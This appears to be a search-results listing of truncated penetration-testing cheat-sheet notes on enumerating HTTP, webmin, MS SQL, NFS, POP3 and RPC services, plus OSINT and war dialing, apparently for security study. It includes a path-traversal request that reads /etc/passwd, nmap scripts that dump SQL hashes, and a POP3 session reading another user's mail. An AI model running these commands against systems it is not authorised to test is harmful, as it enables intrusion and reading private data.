# HTTP Enumeration
- Search for folders with gobuster:
```ShellSession
gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip
```
- OWasp DirBuster - Http folder enumeration - can take a dictionary file
- Dirb - Directory brute force finding using a dictionary file
```ShellSession
dirb http://$ip/ wordlist.dict
dirb <<ht...
Score: 0
# Information Gathering (OWASP Guide)
<!-- TOC -->
- [Conduct search engine discovery/reconnaissance for information leakage (OTG-INFO-001)](#conduct-search-engine-discoveryreconnaissance-for-information-leakage-otg-info-001)
- [Test Objectives](#test-objectives)
- [How to Test](#how-to-test)
- [Use a search engine to search ...
Score: 0
# Miniserv and webmin Enumeration
## Test for LFI & file disclosure vulnerability by grabbing /etc/passwd
```ShellSession
curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%0...
Score: 0
# MS SQL Server Enumeration
- Nmap Information Gathering
```ShellSession
nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQL...
Score: 0
# NFS_Enumeration (Network File System).html
- Show Mountable NFS Shares
```ShellSession
nmap -sV --script=nfs-showmount $ip
```...
Score: 0
# OSINT By recon-ng
## Study case (trivago.com)
```Bash
> recon-ng
## now let's add a workspace
> workspaces add trivago.com
## Add the target domain
> add domains trivago.com
## Double check if domain is added
> show domains
## find related hosts to our domain
> load netcraft
> run
## check added h...
Score: 0
# Passive information gathering
<!-- TOC -->
- [Google](#google)
- [Email Harvesting](#email-harvesting)
- [Netcraft](#netcraft)
- [Whois](#whois)
- [Recon-ng](#recon-ng)
- [Search for people](#search-for-people)
- [Search Engine Recon Defenses](#search-engine-recon-defenses)
<!-- /TOC -->
## Google
- use search ter...
Score: 0
# POP3 Enumeration
## Reading other peoples mail
You may find usernames and passwords for email accounts, so here is how to check the mail using Telnet
```ShellSession
root@kali:~# telnet $ip 110
+OK beta POP3 server (JAMES POP3 Server 2.3.2) ready
USER billydean
+OK
PASS password
+OK Welcome billydean
list
+OK 2 1807
1 786
2...
Score: 0
# RPC Enumeration (Remote Procedure Call)
## Connect to an RPC share without a username and password and enumerate privileges
```ShellSession
rpcclient --user="" --command=enumprivs -N $ip
```
## Connect to an RPC share with a username and enumerate privileges
```ShellSession
rpcclient --user="" --command=enumpriv...
Score: 0
# Scanning
## War Dialers
- War dialers dial a sequence of telephone numbers, attempting to locate modem carriers or a secondary dial tone
- Demon dialers dial a single number to conduct a brute-force attack against passwords
- Often, an unprotected modem provides the easiest method for penetrating a network
- Many recent news stories abou...
Score: 0